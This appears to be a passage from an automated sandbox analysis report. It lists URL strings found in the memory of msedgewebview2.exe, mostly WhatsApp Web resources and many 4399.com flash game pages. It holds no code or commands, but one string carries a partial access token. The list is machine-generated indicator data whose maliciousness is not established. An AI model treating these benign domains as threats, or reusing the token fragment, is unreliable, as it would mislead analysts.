                  Source: msedgewebview2.exe, 0000001D.00000002.3708840845.00002DDC00F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/rom
                  Source: msedgewebview2.exe, 00000020.00000003.2394439778.00001B44005E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/runtime.cf3d9387a416c75bf2cf.js
                  Source: msedgewebview2.exe, 0000001D.00000003.2564490059.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570542880.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2581864583.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565475430.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2573024744.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/serviceworker.js
                  Source: msedgewebview2.exe, 00000020.00000002.3642939068.00001B4400070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/status.json
                  Source: msedgewebview2.exe, 00000020.00000002.3643802658.00001B44000AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/status.jsone=65F3CD4A
                  Source: msedgewebview2.exe, 00000020.00000002.3642939068.00001B4400070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/status.jsonr.js
                  Source: msedgewebview2.exe, 00000020.00000002.3643802658.00001B44000AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/status.jsons_upload_check?type=crashlog&access_token=1063127757113399%7C745
                  Source: msedgewebview2.exe, 00000020.00000002.3642939068.00001B4400070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/status.jsonsapp.net
                  Source: msedgewebview2.exe, 00000020.00000003.2568867078.00001B44003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/te
                  Source: msedgewebview2.exe, 00000026.00000003.2435742291.00004B1800AE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/vendor1~app.264a01b6133c4a120327.js
                  Source: msedgewebview2.exe, 00000020.00000003.2397132096.00001B4400804000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2470478995.00004B180113C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2416602382.00004B1800E60000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2463086287.00004B1801118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2455225183.00004B1800E70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2451528199.00004B1800E68000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2455738825.00004B1800E78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/vendor1~app.264a01b6133c4a120327.js.map
                  Source: msedgewebview2.exe, 0000001D.00000002.3714060448.00002DDC016CF000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3692759678.00002DDC001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/vendor1~app.264a01b6133c4a120327.js:2:66487)
                  Source: msedgewebview2.exe, 0000001D.00000002.3692759678.00002DDC001D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/vendor1~app.264a01b6133c4a120327.js:2:66734)
                  Source: msedgewebview2.exe, 0000001D.00000002.3704676650.00002DDC00BBC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3661828248.00001B4400574000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/vendors~main.75ffa609850dd95ab8d9.js
                  Source: msedgewebview2.exe, 00000020.00000003.2551479725.00001B44004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com/vendors~main.75ffa609850dd95ab8d9.js.map
                  Source: msedgewebview2.exe, 0000001D.00000002.3680176059.0000021F34940000.00000002.00000001.00040000.00000036.sdmpString found in binary or memory: https://web.whatsapp.com/web.whatsapp.com_default
                  Source: msedgewebview2.exe, 0000001D.00000002.3696502178.00002DDC0063C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.com:443
                  Source: msedgewebview2.exe, 00000020.00000003.2568867078.00001B44003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.comar
                  Source: msedgewebview2.exe, 00000020.00000003.2372778488.00001B44003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.comhar
                  Source: msedgewebview2.exe, 00000020.00000003.2372778488.00001B44003B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.comoEntry
                  Source: msedgewebview2.exe, 00000020.00000003.2598410666.00001B4400468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.comsec-ch-ua-mobile?0user-agentMozilla/5.0
                  Source: msedgewebview2.exe, 00000026.00000003.2524635696.00004B18007C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.whatsapp.net
                  Source: msedgewebview2.exe, 00000020.00000002.3642939068.00001B4400070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatsapp.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3700123288.00002DDC0085F000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3694431049.00002DDC003D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3635123350.000000F85CDFC000.00000004.00000010.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3695006796.00002DDC00458000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712703856.00002DDC01558000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3692467201.00002DDC00194000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3710039827.00002DDC01060000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3704505743.00002DDC00B64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatsapp.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3702534004.00002DDC009D0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3708840845.00002DDC00F6C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3704676650.00002DDC00BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatsapp.com/-
                  Source: msedgewebview2.exe, 0000001D.00000002.3694431049.00002DDC003D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatsapp.com//
                  Source: msedgewebview2.exe, 0000001D.00000002.3708840845.00002DDC00F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatsapp.com/4
                  Source: msedgewebview2.exe, 0000001D.00000002.3708840845.00002DDC00F6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatsapp.com/44-
                  Source: msedgewebview2.exe, 0000001D.00000002.3704676650.00002DDC00BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatsapp.com/h
                  Source: msedgewebview2.exe, 0000001D.00000002.3704676650.00002DDC00BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatsapp.com/man
                  Source: msedgewebview2.exe, 0000001D.00000002.3697824582.00002DDC00714000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatsapp.com/pp.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3704676650.00002DDC00BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatsapp.com/r_url
                  Source: msedgewebview2.exe, 0000001D.00000002.3697824582.00002DDC00714000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatsapp.com/static.whatsapp.net/rsrc.php/v3/yr/r/_ElV2y1OxOx.js?_nc_x=Ij3Wp8lg5Kz
                  Source: msedgewebview2.exe, 0000001D.00000002.3711643656.00002DDC011E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatsapp.com/t/wa_qpl_data
                  Source: msedgewebview2.exe, 00000024.00000002.2422477300.0000245400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/
                  Source: msedgewebview2.exe, 00000026.00000003.2465710972.00004B1800894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3690645093.00002DDC0008C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.2345.com/?
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/100030_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/10305_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/10379.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/10379_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/107884_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/109832_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/110975_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/112689_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/115339_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/117227_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/117945_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/118852_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/122099_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/12669_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/127539_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/130389_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/130396.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/130396_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/132028.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/133630_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/134302_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/136516_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/137116_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/137953_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/1382_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/145991_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/151915_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/155283_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/155476_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/15548_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/160944_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/163478_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/171322_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/173634_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/173634_4.htmhttps://www.4399.com/flash/171322_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/177937_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/17801_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/18012.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/18012_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/180977_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/18169_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/187040_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/187228_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/188593.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/188739_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/189558_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/191203_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/195673_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/195990_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/198491_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/198637_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/198660_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/199408_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/202061_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/202574_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/202604_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/202692_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/202724_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/202785.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/202819_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/202828_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/202901_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/202907_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/202911_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203018_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203093_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203152.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203153_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203154.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203166_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203178_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203215_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203231_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203369_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203371_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203404_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203453_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203476_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203481_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203495_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203515_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203564_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203682_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/203768_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/204044_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/204056_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/204206.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/204255_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/204290_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/204422_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/204429_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/204562_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/204650_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/204685_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/204886_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/204926_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/204952_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/204989_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/205090_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/205090_2.htmhttps://www.4399.com/flash/204989_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/205147.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/205165.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/205182.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/205235_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/205325_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/205341_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/205462_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/205536_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/205551_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/205845_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/206114_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/20660_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/206724_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/207195_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/207717_3.htm
